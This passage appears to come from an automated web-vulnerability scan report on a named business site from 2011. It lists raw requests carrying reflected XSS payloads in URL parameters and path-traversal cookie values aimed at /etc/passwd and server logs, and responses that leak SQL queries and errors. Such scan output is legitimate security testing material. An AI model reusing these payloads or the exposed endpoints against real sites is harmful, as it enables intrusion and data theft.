prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000601)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc%00%27%22--%3E%3C%2Fs..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc'"--></style></script><script>alert(0x000605)</script>

Request

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000605)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r9728avvj5s5sa04j4cfhpvk81; path=/
Content-Length: 3313
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000605)</script>/' union select prj.catI' at line 5
- /updateCity.html

/updateCity.html CONFIRMED

http://www.insideup.com/updateCity.html?city='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
city GET '"--></style></script><script>alert(0x0009B3)</script>

Request

GET /updateCity.html?city='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009B3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/cityLinks.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=25F8AD3D3259B1CFC30B34CBA0DC2BE9; Path=/
Content-Length: 65
Connection: close
Content-Type: text/html; charset=UTF-8


'"--></style></script><script>netsparker(0x0009B3)</script>/null/
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='%3E%3Cscript..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
nsextt GET '><script>alert(9)</script>

Request

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ape7q7qe031rd5o4jstgv6kjk7; path=/
Content-Length: 3113
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 